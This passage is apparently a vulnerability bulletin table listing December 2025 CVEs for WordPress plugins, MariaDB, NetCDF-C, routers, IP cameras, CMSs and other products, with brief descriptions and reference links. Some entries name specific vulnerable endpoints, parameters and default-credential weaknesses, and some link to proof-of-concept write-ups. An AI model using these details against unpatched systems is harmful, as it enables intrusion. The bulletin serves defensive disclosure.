| Liton Arefin--WP Adminify | Missing Authorization vulnerability in Liton Arefin WP Adminify adminify allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Adminify: from n/a through <= 4.0.6.1. | 2025-12-24 | not yet calculated | CVE-2025-68592 | https://vdp.patchstack.com/database/Wordpress/Plugin/adminify/vulnerability/wordpress-wp-adminify-plugin-4-0-6-1-broken-access-control-vulnerability-2?_s_id=cve |
| Liton Arefin--WP Adminify | Missing Authorization vulnerability in Liton Arefin WP Adminify adminify allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Adminify: from n/a through <= 4.0.6.1. | 2025-12-24 | not yet calculated | CVE-2025-68593 | https://vdp.patchstack.com/database/Wordpress/Plugin/adminify/vulnerability/wordpress-wp-adminify-plugin-4-0-6-1-broken-access-control-vulnerability?_s_id=cve |
| LiveComposer--Page Builder: Live Composer | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LiveComposer Page Builder: Live Composer live-composer-page-builder allows Stored XSS. This issue affects Page Builder: Live Composer: from n/a through <= 2.0.5. | 2025-12-24 | not yet calculated | CVE-2025-68598 | https://vdp.patchstack.com/database/Wordpress/Plugin/live-composer-page-builder/vulnerability/wordpress-page-builder-live-composer-plugin-2-0-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| MariaDB--MariaDB | MariaDB mariadb-dump Utility Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of MariaDB. Interaction with the mariadb-dump utility is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the handling of view names. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27000. | 2025-12-23 | not yet calculated | CVE-2025-13699 | ZDI-25-1025 vendor-provided URL |
| Marketing Fire--Editorial Calendar | Missing Authorization vulnerability in Marketing Fire Editorial Calendar editorial-calendar allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Editorial Calendar: from n/a through <= 3.8.8. | 2025-12-24 | not yet calculated | CVE-2025-68603 | https://vdp.patchstack.com/database/Wordpress/Plugin/editorial-calendar/vulnerability/wordpress-editorial-calendar-plugin-3-8-8-broken-access-control-vulnerability?_s_id=cve |
| Mitchell Bennis--Simple File List | Missing Authorization vulnerability in Mitchell Bennis Simple File List simple-file-list allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Simple File List: from n/a through <= 6.1.15. | 2025-12-24 | not yet calculated | CVE-2025-68591 | https://vdp.patchstack.com/database/Wordpress/Plugin/simple-file-list/vulnerability/wordpress-simple-file-list-plugin-6-1-15-broken-access-control-vulnerability?_s_id=cve |
| modeltheme--ModelTheme Addons for WPBakery and Elementor | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in modeltheme ModelTheme Addons for WPBakery and Elementor modeltheme-addons-for-wpbakery allows Stored XSS. This issue affects ModelTheme Addons for WPBakery and Elementor: from n/a through < 1.5.6. | 2025-12-24 | not yet calculated | CVE-2025-68532 | https://vdp.patchstack.com/database/Wordpress/Plugin/modeltheme-addons-for-wpbakery/vulnerability/wordpress-modeltheme-addons-for-wpbakery-and-elementor-plugin-1-5-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| MSP360--Free Backup | MSP360 Free Backup Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of MSP360 Free Backup. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. User interaction on the part of an administrator is needed additionally. The specific flaw exists within the restore functionality. By creating a junction, an attacker can abuse the service to create arbitrary files. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27245. | 2025-12-23 | not yet calculated | CVE-2025-12838 | ZDI-25-988 |
| Frappe--Attachments module of Frappe Framework v15.89.0 | An arbitrary file upload vulnerability in the Attachments module of Frappe Framework v15.89.0 allows attackers to execute arbitrary code via uploading a crafted XML file. | 2025-12-22 | not yet calculated | CVE-2025-67289 | http://erpnext.com http://frappe.com https://github.com/vuquyen03/CVE/blob/main/CVE-2025-67289/README.md |
| Blitz--Blitz Panel v1.17.0 | An open redirect vulnerability in the login endpoint of Blitz Panel v1.17.0 allows attackers to redirect users to malicious domains via a crafted URL. This issue affects the next_url parameter in the login endpoint and could lead to phishing or token theft after successful authentication. | 2025-12-24 | not yet calculated | CVE-2025-60935 | https://github.com/ReturnFI/Blitz https://gist.github.com/HEXER365/2e866b47d56585e1e59e7c16bf4b4db7 |
| Cadmium--Cadmium CMS v.0.4.9 | Cadmium CMS v.0.4.9 has a background arbitrary file upload vulnerability in /admin/content/filemanager/uploads. | 2025-12-23 | not yet calculated | CVE-2025-51511 | https://github.com/cadmium-org/cadmium-cms/issues/23 |
| ClinCapture--ClinCapture EDC 3.0 and 2.2.3 | Reflected cross-site scripting (XSS) vulnerability in ClinCapture EDC 3.0 and 2.2.3, allowing an unauthenticated remote attacker to execute JavaScript code in the context of the victim's browser. | 2025-12-22 | not yet calculated | CVE-2025-65270 | https://www.clincapture.com/ https://github.com/xh4vm/CVE-2025-65270 |
| ClipBucket--ClipBucket 5.5.2 | ClipBucket 5.5.2 is affected by an improper access control issue where the product is shipped or deployed with hardcoded default administrative credentials. An unauthenticated remote attacker can log in to the administrative panel using these default credentials, resulting in full administrative control of the application. | 2025-12-22 | not yet calculated | CVE-2025-67418 | http://clipbucket.com https://medium.com/@arpit03sharma2003/cve-2025-67418-when-default-credentials-become-a-remote-root-button-03be5ee4b927 |
| CloudLog--Cloudlog v2.6.15 | Time-based blind SQL Injection vulnerability in Cloudlog v2.6.15 at the endpoint /index.php/logbookadvanced/search in the qsoresults parameter. | 2025-12-26 | not yet calculated | CVE-2024-44065 | https://github.com/magicbug/Cloudlog https://github.com/jacopo1223/jacopo.github/tree/main/CVE-2024-44065 |
| Cola--Cola Dnslog v1.3.2 | Cola Dnslog v1.3.2 is vulnerable to Directory Traversal. When a DNS query for a TXT record is processed, the application concatenates the requested URL (or a portion of it) directly with a base path using os.path.join. This bypass allows directory traversal or absolute path injection, leading to the potential exposure of sensitive information. | 2025-12-26 | not yet calculated | CVE-2025-57403 | https://github.com/AbelChe/cola_dnslog/issues/29 https://gist.github.com/Captaince/99b728c792c72b2666c2400625702df0 |
| Comtech--Comtech EF Data CDM-625 / CDM-625A | Incorrect access control in Comtech EF Data CDM-625 / CDM-625A Advanced Satellite Modem with firmware v2.5.1 allows attackers to change the Administrator password and escalate privileges via sending a crafted POST request to /Forms/admin_access_1. | 2025-12-26 | not yet calculated | CVE-2025-67015 | https://www.comtechefdata.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-67015%20_%20Comtech%20EF%20Data%20CDM-625%20_%20CDM-625A%20Advanced%20_%20Broken%20Access%20Control |
| Croogo--Croogo CMS 4.0.7 | A path traversal vulnerability in Croogo CMS 4.0.7 allows remote attackers to read arbitrary files via a specially crafted path in the 'edit-file' parameter. | 2025-12-26 | not yet calculated | CVE-2024-42718 | https://github.com/croogo/croogo https://github.com/jacopo1223/jacopo.github/tree/main/CVE-2024-42718 |
| --Delight Custom Firmware (CFW) for Nokia Symbian Belle devices on Nokia 808 (Delight v1.8), Nokia N8 (Delight v6.7), Nokia E7 (Delight v1.3), Nokia C7 (Delight v6.7), Nokia 700 (Delight v1.2), Nokia 701 (Delight v1.1), Nokia 603 (Delight v1.0), Nokia 500 (Delight v1.2), Nokia E6 (Delight v1.0), Nokia Oro (Delight v1.0), and Vertu Constellation T (Delight v1.0) | An issue was discovered in the Delight Custom Firmware (CFW) for Nokia Symbian Belle devices on Nokia 808 (Delight v1.8), Nokia N8 (Delight v6.7), Nokia E7 (Delight v1.3), Nokia C7 (Delight v6.7), Nokia 700 (Delight v1.2), Nokia 701 (Delight v1.1), Nokia 603 (Delight v1.0), Nokia 500 (Delight v1.2), Nokia E6 (Delight v1.0), Nokia Oro (Delight v1.0), and Vertu Constellation T (Delight v1.0) allowing local attackers to inject startup scripts via crafted .txt files in the :\Data directory. | 2025-12-26 | not yet calculated | CVE-2025-65885 | https://www.symwld.com/delight/ https://gist.github.com/symbuzzer/3315e88adc2bba0b6cc66d192b49546d |
| --DEV Systemtechnik GmbH DEV 7113 RF over Fiber Distribution System 32-0078 H.01 | Incorrect access control in DEV Systemtechnik GmbH DEV 7113 RF over Fiber Distribution System 32-0078 H.01 allows unauthenticated attackers to access an administrative endpoint. | 2025-12-26 | not yet calculated | CVE-2025-67014 | https://dev-systemtechnik.com https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-67014%20_%20DEV%20Systemtechnik%20GmbH%20DEV%207113%20RF%20over%20_%20Broken%20Access%20Control |
| Eclipse--Eclipse Cyclone DDS before v0.10.5 | Improper verification of the time certificate in Eclipse Cyclone DDS before v0.10.5 allows attackers to bypass certificate checks and execute commands with System privileges. | 2025-12-23 | not yet calculated | CVE-2025-67109 | http://eclipse.com https://github.com/eclipse-cyclonedds/cyclonedds/blob/master/src/ddsrt/src/time/posix/time.c#L28 https://github.com/eclipse-cyclonedds/cyclonedds/blob/master/src/security/builtin_plugins/authentication/src/auth_utils.c#L84 https://gist.github.com/lkloliver/669e15bc7e6194133e4ee1026ce157e6 |
| eProsima--eProsima Fast-DDS v3.3 | An integer overflow in eProsima Fast-DDS v3.3 allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2025-12-23 | not yet calculated | CVE-2025-65865 | http://eprosima.com http://fast-dds.com https://github.com/lkloliver/poc/blob/main/Detail.md https://gist.github.com/lkloliver/7aa48cb9fc7a1dd74cb595212bb69d33 |
| eProsima--eProsima Fast-DDS v3.3 | eProsima Fast-DDS v3.3 was discovered to contain improper validation for ticket revocation, resulting in insecure communications and connections. | 2025-12-23 | not yet calculated | CVE-2025-67108 | http://eprosima.com http://fast-dds.com https://github.com/eProsima/Fast-DDS/blob/master/src/cpp/security/accesscontrol/Permissions.cpp#L263 https://gist.github.com/lkloliver/81b5d5a8328d712dbfd497bf11dbe913 |
| --ETL Systems Ltd DEXTRA Series ' Digital L-Band Distribution System v1.8 | The web management interface in ETL Systems Ltd DEXTRA Series ' Digital L-Band Distribution System v1.8 does not implement Cross-Site Request Forgery (CSRF) protection mechanisms (no tokens, no Origin/Referer validation) on critical configuration endpoints. | 2025-12-26 | not yet calculated | CVE-2025-67013 | https://www.etlsystems.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-67013%20_%20ETL%20Systems%20Ltd%20DEXTRA%20Series%20_%20CSRF |
| FluentCMS--FluentCMS 1.2.3. | A cross-site scripting (XSS) vulnerability was identified in FluentCMS 1.2.3. After logging in as an admin and navigating to the "Add Page" function, the application fails to properly sanitize input in the <head> section, allowing remote attackers to inject arbitrary script tags. | 2025-12-26 | not yet calculated | CVE-2025-67349 | https://github.com/fluentcms/FluentCMS/issues/2403 https://github.com/eoniboogie/CVE_Disclosures/blob/main/CVE-2025-67349/CVE-2025-67349.md |
| FuguHub--FuguHub 8.1 | A reflected cross-site scripting (XSS) vulnerability exists in FuguHub 8.1 when serving SVG files through the /fs/ file manager interface. FuguHub does not sanitize or restrict script execution inside SVG content. When a victim opens a crafted SVG containing an inline <script> element, the browser executes the attacker-controlled JavaScript. | 2025-12-22 | not yet calculated | CVE-2025-65790 | https://fuguhub.com/ https://github.com/hunterxxx/FuguHub-8.1-Reflected-SVG-XSS-CVE-2025-65790 |
| GNU--GNU Unrtf v0.21.10 | A stack overflow in the src/main.c component of GNU Unrtf v0.21.10 allows attackers to cause a Denial of Service (DoS) via injecting a crafted input into the filename parameter. | 2025-12-23 | not yet calculated | CVE-2025-65410 | https://www.gnu.org/software/unrtf/ https://lists.gnu.org/archive/html/bug-unrtf/2025-11/msg00001.html https://savannah.gnu.org/projects/unrtf/ https://hg.savannah.gnu.org/hgweb/unrtf/rev/a5d3b025a8b1 |
| --GT Edge AI Platform before v2.0.10 | Insecure permissions in the /api/v1/agents API of GT Edge AI Platform before v2.0.10-dev allows unauthorized attackers to access sensitive information. | 2025-12-22 | not yet calculated | CVE-2025-63662 | https://github.com/p80n-sec/Vulnerability-Research/blob/main/Pending https://gist.github.com/p80n-sec/48ce34c929e8b946f0ad25f76e7b8cef |
| --GT Edge AI Platform before v2.0.10 | Incorrect access control in the /api/v1/conversations/*/files API of GT Edge AI Platform before v2.0.10 allows unauthorized attackers to access other users' uploaded files. | 2025-12-22 | not yet calculated | CVE-2025-63663 | https://github.com/p80n-sec/Vulnerability-Research/blob/main/Pending https://gist.github.com/p80n-sec/f3ca933480157cb4e18c387d92f4d0c2 |
| --GT Edge AI Platform before v2.0.10 | Incorrect access control in the /api/v1/conversations/*/messages API of GT Edge AI Platform before v2.0.10-dev allows unauthorized attackers to access other users' message history with AI agents. | 2025-12-22 | not yet calculated | CVE-2025-63664 | https://github.com/p80n-sec/Vulnerability-Research/blob/main/Pending https://gist.github.com/p80n-sec/0a0a71a2190d5e6f8083bf6069e7b5f2 |
| --Home Assistant Core before v2025.8.0 | Home Assistant Core before v2025.8.0 is vulnerable to Directory Traversal. The Downloader integration does not fully validate file paths during concatenation, leaving a path traversal vulnerability. | 2025-12-23 | not yet calculated | CVE-2025-65713 | https://github.com/home-assistant/core/pull/150046 https://gist.github.com/GenoWang/7359360285e0fe21a7a58d10ff71d032 |
| --K7 Ultimate Security 17.0.2045. | An issue was discovered in K7 Ultimate Security 17.0.2045. A Local Privilege Escalation (LPE) vulnerability in the K7 Ultimate Security antivirus can be exploited by a local unprivileged user on default installations of the product. Insecure access to a named pipe allows unprivileged users to edit any registry key, leading to a full compromise as SYSTEM. | 2025-12-22 | not yet calculated | CVE-2025-67826 | https://www.k7computing.com/ https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-22nd-Dec-2025 |
| --Keyfactor SignServer versions prior to 7.2. | An error in the SignServer container startup logic was found in Keyfactor SignServer versions prior to 7.2. The Admin CLI command used to configure Certificate access to the initial startup of the container sets a property of "allowany" to allow any user with a valid and trusted client auth certificate to connect. Admins can then set more restricted access to specific certificates. A logic error caused this admin CLI command to be run on each restart of the container instead of only the first startup as intended resetting the configuration to "allowany". | 2025-12-22 | not yet calculated | CVE-2025-26787 | https://support.keyfactor.com/hc/en-us/articles/33997706776987-SignServer-security-advisory-Container-vulnerability-CVE-2025-26787-fixed-in-version-7-2 https://docs.keyfactor.com/signserver/latest/signserver-7-2-release-notes |
| Krishanmuraiji--krishanmuraiji SMS v.1.0 | SQL injection vulnerability in krishanmuraiji SMS v.1.0, within the /studentms/admin/edit-class-detail.php via the editid GET parameter. An attacker can trigger controlled delays using SQL SLEEP() to infer database contents. Successful exploitation may lead to full database compromise, especially within an administrative module. | 2025-12-26 | not yet calculated | CVE-2025-66947 | https://github.com/kabir0104k/CVE-2025-66947/blob/main/README.md |
| libxmljs--libxmljs 1.0.11 | A vulnerability exists in the libxmljs 1.0.11 when parsing a specially crafted XML document. Accessing the internal _ref property on entity_ref and entity_decl nodes causes a segmentation fault, potentially leading to a denial-of-service (DoS). | 2025-12-26 | not yet calculated | CVE-2025-25341 | https://github.com/libxmljs/libxmljs/issues/667 |
| Linksys--Linksys E5600 V1.1.0.26 | Linksys E5600 V1.1.0.26 is vulnerable to command injection in the runtime.macClone function via the mc.ip parameter. | 2025-12-23 | not yet calculated | CVE-2025-29228 | https://github.com/JZP018/Vuln/blob/main/linsys/E5600/CI_macClone_mc.ip/CI_macClone_mc.ip.md |
| Linksys--Linksys E5600 V1.1.0.26 | Linksys E5600 V1.1.0.26 is vulnerable to command injection in the function ddnsStatus. | 2025-12-23 | not yet calculated | CVE-2025-29229 | https://github.com/JZP018/Vuln/blob/main/linsys/E5600/CI_ddnsStatus/CI_ddnsStatus.md |
| n/a--LSC Smart Connect Indoor IP Camera 1.4.13 | LSC Smart Connect Indoor IP Camera 1.4.13 contains an RCE vulnerability in start_app.sh. | 2025-12-22 | not yet calculated | CVE-2025-65817 | https://github.com/Istaarkk/CVE-2025-65817/blob/main/README.md |
| --Media module of Piranha CMS v12.1 | A stored cross-site scripting (XSS) vulnerability in the Media module of Piranha CMS v12.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name field. | 2025-12-22 | not yet calculated | CVE-2025-67291 | http://piranha.com https://github.com/vuquyen03/CVE/tree/main/CVE-2025-67291 |
| MyNET--MyNET up to v26.05 | MyNET up to v26.05 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the src parameter. | 2025-12-22 | not yet calculated | CVE-2024-25812 | https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN https://github.com/am0nt31r0/Common-Vulnerabilities-and-Exposures-CVE-/blob/main/MyNet.md |
| MyNET--MyNET up to v26.05 | MyNET up to v26.05 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the msg parameter. | 2025-12-22 | not yet calculated | CVE-2024-25814 | https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN https://github.com/am0nt31r0/Common-Vulnerabilities-and-Exposures-CVE-/blob/main/MyNet.md |
| MyNET--MyNET up to v26.06 | Iframe injection vulnerability in airc.pt/solucoes-servicos.solucoes MyNET v.26.06 and before allows a remote attacker to execute arbitrary code via the src parameter. | 2025-12-22 | not yet calculated | CVE-2024-27708 | https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN https://github.com/esquim0/Common_Vulnerabilities_and_Exposures_CVE/blob/main/2024/MyNet.md |
| MyNET--MyNET up to v26.08 | MyNET up to v26.08 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the msgtipo parameter. | 2025-12-22 | not yet calculated | CVE-2024-35321 | https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN https://github.com/am0nt31r0/Common-Vulnerabilities-and-Exposures-CVE-/blob/main/MyNet.md https://github.com/Manuel-arc/Common-Vulnerabilities-and-Exposures-CVE-/blob/main/MyNet.md |
| MyNET--MyNET up to v26.08 | MyNET up to v26.08 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the ficheiro parameter. | 2025-12-24 | not yet calculated | CVE-2024-35322 | https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN https://miguelsantareno.github.io/airc_exploit.txt |
| MyNET--MyNET up to v26.08 | A reflected cross-site scripting (XSS) vulnerability in MyNET up to v26.08 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the parameter HTTP. | 2025-12-24 | not yet calculated | CVE-2024-40317 | https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN https://miguelsantareno.github.io/airc_exploit.txt |
| MyNET--MyNET up to v26.08.316 | MyNET up to v26.08.316 was discovered to contain an Unauthenticated SQL Injection vulnerability via the intmenu parameter. | 2025-12-24 | not yet calculated | CVE-2024-39037 | https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN https://miguelsantareno.github.io/airc_exploit.txt |
| Netgear--Netgear EX8000 V1.0.0.126 | Netgear EX8000 V1.0.0.126 is vulnerable to Command Injection via the iface parameter in the action_bandwidth function. | 2025-12-23 | not yet calculated | CVE-2025-45493 | https://github.com/JZP018/vuln03/blob/main/netgear/EX8000/cve-netgear_EX8000_CI_action_bandwidth.pdf https://github.com/JZP018/vuln03/blob/main/netgear/EX8000/netgear_EX8000_CI_action_bandwidth.mp4 |
| Netgear--Netgear EX8000 V1.0.0.126 | Netgear EX8000 V1.0.0.126 was discovered to contain a command injection vulnerability via the switch_status function. | 2025-12-23 | not yet calculated | CVE-2025-50526 | https://github.com/JZP018/vuln03/blob/main/netgear/EX8000/cve-netgear_EX8000_CI_switch_status.pdf https://github.com/JZP018/vuln03/blob/main/netgear/EX8000/netgear_EX8000_CI_switch_status.mp4 |
| --Page Settings module of Piranha CMS v12.1 | A stored cross-site scripting (XSS) vulnerability in the Page Settings module of Piranha CMS v12.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Excerpt field. | 2025-12-22 | not yet calculated | CVE-2025-67290 | http://piranha.com https://github.com/vuquyen03/CVE/tree/main/CVE-2025-67290 |
| --PluXml CMS 5.8.22 | Authenticated Remote Code Execution (RCE) in PluXml CMS 5.8.22 allows an attacker with administrator panel access to inject a malicious PHP webshell into a theme file (e.g., home.php). | 2025-12-22 | not yet calculated | CVE-2025-67436 | https://github.com/pluxml/PluXml https://github.com/RajChowdhury240/CVE-2025-67435/ |
| --PublicCMS V5.202506.b | PublicCMS V5.202506.b is vulnerable to Cross Site Scripting (XSS) in the Content Search module. | 2025-12-22 | not yet calculated | CVE-2025-65837 | https://github.com/Hyperkopite/PublicCMS_Vulns/blob/main/XSS_1.md https://github.com/sanluan/PublicCMS/issues/100 |
| --RTPS protocol implementation of OpenDDS DDS before v3.33.0 | An integer overflow in the RTPS protocol implementation of OpenDDS DDS before v3.33.0 allows attackers to cause a Denial of Service (DoS) via a crafted message. | 2025-12-23 | not yet calculated | CVE-2025-67111 | https://github.com/lkloliver/poc/blob/main/POC_OpenDDS.md https://gist.github.com/lkloliver/fcc5da83b4cba137ce95177a9afc4126 |
| RuoYi--RuoYi v.4.7.9 | SQL Injection vulnerability in RuoYi v.4.7.9 and before allows a remote attacker to execute arbitrary code via the createTable function in SqlUtil.java. | 2025-12-23 | not yet calculated | CVE-2024-57521 | https://gitee.com/y_project/RuoYi/commit/ddd858ca732618a472b10eaab2f8e4b45812ffc5 https://gitee.com/y_project/RuoYi/issues/IBC976 https://github.com/mrlihd/Ruoyi-4.7.9-SQL-Injection-PoC https://github.com/mrlihd/CVE-2024-57521-SQL-Injection-PoC/blob/main/README.md |
| Schlix--Schlix CMS before v2.2.9-5 | Schlix CMS before v2.2.9-5 is vulnerable to Cross Site Scripting (XSS). Due to lack of javascript sanitization in the login form, incorrect login attempts in logs are triggered as XSS in the admin panel. | 2025-12-22 | not yet calculated | CVE-2025-67443 | https://www.schlix.com/news/release/december-2025-errata-5-bug-fix-release.html#:~:text=Fixed%20XSS%20vulnerability%20bug%20when%20clicking%20New%20User%20%28thank%20you%20to%20Ak%C4%B1ner%20K%C4%B1sa%20who%20reported%20this%20security%20bug%20and%20provided%20reasonable%20time%20to%20fix%29 https://gist.github.com/akinerkisa/b22f4517a4011d049c5fc7fd3b29c9f2 |
| Speedify--Speedify VPN up to v15.0.0 | A command injection vulnerability in the me.connectify.SMJobBlessHelper XPC service of Speedify VPN up to v15.0.0 allows attackers to execute arbitrary commands with root-level privileges. | 2025-12-23 | not yet calculated | CVE-2025-25364 | https://connectify.me https://speedify.com/ https://speedify.com/blog/news/speedify-macos-vpn-application-vulnerability/ |
| TechStore--TechStore version 1.0. | A reflected Cross-Site Scripting (XSS) vulnerability has been identified in TechStore version 1.0. The user_name endpoint reflects the id query parameter directly into the HTML response without output encoding or sanitization, allowing execution of arbitrary JavaScript code in a victim's browser. | 2025-12-23 | not yet calculated | CVE-2025-66845 | https://gist.github.com/MuratSevri/d78efed86ca5f82e8a6683ace5061319 |
| Terra--Terra Informatica Software, Inc Sciter v.4.4.7.0 | An issue in Terra Informatica Software, Inc Sciter v.4.4.7.0 allows a local attacker to obtain sensitive information via the adopt component of the Sciter video rendering function. | 2025-12-26 | not yet calculated | CVE-2024-29720 | https://github.com/sciter-sdk/rust-sciter/issues/143 |
| Umbraco--Umbraco CMS v16.3.3 | An arbitrary file upload vulnerability in Umbraco CMS v16.3.3 allows attackers to execute arbitrary code via uploading a crafted PDF file. | 2025-12-22 | not yet calculated | CVE-2025-67288 | http://umbraco.com https://github.com/vuquyen03/CVE/tree/main/CVE-2025-67288 |
| Webmail--Webmail Classic UI of Zimbra Collaboration (ZCS) 10.0 and 10.1 | A Local File Inclusion (LFI) vulnerability exists in the Webmail Classic UI of Zimbra Collaboration (ZCS) 10.0 and 10.1 because of improper handling of user-supplied request parameters in the RestFilter servlet. An unauthenticated remote attacker can craft requests to the /h/rest endpoint to influence internal request dispatching, allowing inclusion of arbitrary files from the WebRoot directory. | 2025-12-22 | not yet calculated | CVE-2025-68645 | https://wiki.zimbra.com/wiki/Security_Center https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy |
| Xiongmai--Xiongmai XM530 IP cameras on Firmware V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06 | Authentication bypass vulnerability in Xiongmai XM530 IP cameras on Firmware V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06 allows unauthenticated remote attackers to access sensitive device information and live video streams. The ONVIF implementation fails to enforce authentication on 31 critical endpoints, enabling direct unauthorized video stream access. | 2025-12-22 | not yet calculated | CVE-2025-65856 | http://ip.com http://hangzhou.com https://luismirandaacebedo.github.io/CVE-2025-65856/ |
| Xiongmai--Xiongmai XM530 IP cameras on firmware V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06 | An issue was discovered in Xiongmai XM530 IP cameras on firmware V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06. The GetStreamUri exposes RTSP URIs containing hardcoded credentials, enabling direct unauthorized video stream access. | 2025-12-22 | not yet calculated | CVE-2025-65857 | http://ip.com http://hangzhou.com https://luismirandaacebedo.github.io/CVE-2025-65857/ |
| Yealink--Yealink T21P_E2 Phone 52.84.0.15 | Yealink T21P_E2 Phone 52.84.0.15 is vulnerable to Directory Traversal. A remote normally-privileged attacker can read arbitrary files via a crafted request to the result read function of the diagnostic component. | 2025-12-26 | not yet calculated | CVE-2025-66737 | http://yealink.com https://drive.google.com/file/d/1MpxnCL4koKupqWWDmY3ljlybjIPD8ieD/view?usp=sharing |
| Yealink--Yealink T21P_E2 Phone 52.84.0.15 | An issue in Yealink T21P_E2 Phone 52.84.0.15 allows a remote normally-privileged attacker to execute arbitrary code via a crafted request to the ping function of the diagnostic component. | 2025-12-26 | not yet calculated | CVE-2025-66738 | http://yealink.com https://drive.google.com/file/d/13t5ywSPJMx4487njJcH3ZTNuc_k3h4ty/view?usp=sharing |
| youlai--youlai-boot V2.21.1 | youlai-boot V2.21.1 is vulnerable to Incorrect Access Control. The getRoleForm function in SysRoleController.java does not perform permission checks, which may allow non-root users to directly access root roles. | 2025-12-22 | not yet calculated | CVE-2025-66735 | https://gitee.com/youlaiorg/youlai-boot/issues/ICH8FR https://gitee.com/youlaiorg/youlai-boot/commit/9197065102f92264ded814a9d3e9f2a4ff0da121 https://gist.github.com/old6ma/dc9e6e4a693d12c1a35fd4e1d21d4743 |
| youlai--youlai-boot V2.21.1 | youlai-boot V2.21.1 is vulnerable to Incorrect Access Control. The importUsers function in SysUserController.java does not perform a permission check on the current user's identity, which may allow regular users to import user data into the database, resulting in an authorization bypass vulnerability. | 2025-12-22 | not yet calculated | CVE-2025-66736 | https://gitee.com/youlaiorg/youlai-boot/commit/9197065102f92264ded814a9d3e9f2a4ff0da121 https://gitee.com/youlaiorg/youlai-boot/issues/ICH8FV https://gist.github.com/old6ma/be1d4a5373ee2de901ed4c8d81485046 |
| Nawawi Jamili--Docket Cache | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Nawawi Jamili Docket Cache docket-cache allows PHP Local File Inclusion. This issue affects Docket Cache: from n/a through <= 24.07.03. | 2025-12-24 | not yet calculated | CVE-2025-68506 | https://vdp.patchstack.com/database/Wordpress/Plugin/docket-cache/vulnerability/wordpress-docket-cache-plugin-24-07-03-local-file-inclusion-vulnerability?_s_id=cve |
| NSF Unidata--NetCDF-C | NSF Unidata NetCDF-C Time Unit Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NSF Unidata NetCDF-C. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of time units. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27273. | 2025-12-23 | not yet calculated | CVE-2025-14932 | ZDI-25-1153 |
| NSF Unidata--NetCDF-C | NSF Unidata NetCDF-C NC Variable Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NSF Unidata NetCDF-C. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of NC variables. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27266. | 2025-12-23 | not yet calculated | CVE-2025-14933 | ZDI-25-1151 |
| NSF Unidata--NetCDF-C | NSF Unidata NetCDF-C Variable Name Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NSF Unidata NetCDF-C. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of variable names. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27267. | 2025-12-23 | not yet calculated | CVE-2025-14934 | ZDI-25-1152 |
| NSF Unidata--NetCDF-C | NSF Unidata NetCDF-C Dimension Name Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NSF Unidata NetCDF-C. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of dimension names. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27168. | 2025-12-23 | not yet calculated | CVE-2025-14935 | ZDI-25-1154 |
